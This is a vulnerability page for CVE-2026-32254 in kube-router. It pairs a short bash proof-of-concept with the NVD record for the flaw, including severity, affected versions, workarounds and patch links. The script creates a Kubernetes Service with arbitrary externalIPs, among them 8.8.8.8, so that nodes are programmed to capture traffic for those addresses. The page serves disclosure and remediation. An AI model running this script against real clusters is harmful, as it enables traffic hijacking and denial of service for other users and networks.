CVE-2026-32254

#!/bin/bash # CVE-2026-32254 PoC - Kube-router External IPs Validation Bypass # This PoC demonstrates creating a Service with arbitrary externalIPs # Prerequisites: valid kubeconfig with permissions to create Services export KUBECONFIG=${KUBECONFIG:-"/etc/kubernetes/admin.conf"} # Create a malicious Service with arbitrary externalIP cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Service metadata: name: malicious-service namespace: default spec: type: ClusterIP ports: - port: 80 targetPort: 80 protocol: TCP externalIPs: - 192.168.1.100 - 10.0.0.1 - 8.8.8.8 selector: app: nginx EOF echo "[+] Malicious Service created" echo "[+] Check iptables rules on nodes:" echo " kubectl get nodes -o wide" echo " ssh <node> iptables -L -n | grep 192.168.1.100" echo "[+] Cleanup:" echo " kubectl delete service malicious-service"

{"cve": {"id": "CVE-2026-32254", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:24.340", "lastModified": "2026-03-19T18:06:51.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kube-router is a turnkey solution for Kubernetes networking. Prior to version 2.8.0, Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration. Version 2.8.0 contains a patch for the issue. Available workarounds include enabling DenyServiceExternalIPs feature gate, deploying admission policy, restricting service creation RBAC, monitoring service changes, and applying BGP prefix filtering."}, {"lang": "es", "value": "Kube-router es una solución llave en mano para redes de Kubernetes. Antes de la versión 2.8.0, el módulo proxy de Kube-router no valida las externalIPs o las IPs de loadBalancer antes de programarlas en la configuración de red del nodo. La versión 2.8.0 contiene un parche para el problema. Las soluciones alternativas disponibles incluyen habilitar la puerta de características DenyServiceExternalIPs, desplegar una política de admisión, restringir el RBAC de creación de servicios, monitorear los cambios de servicio y aplicar el filtrado de prefijos BGP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kube-router:kube-router:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "C1324BAF-805F-49AF-9BAB-9218F73A9A2C"}]}]}], "references": [{"url": "https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}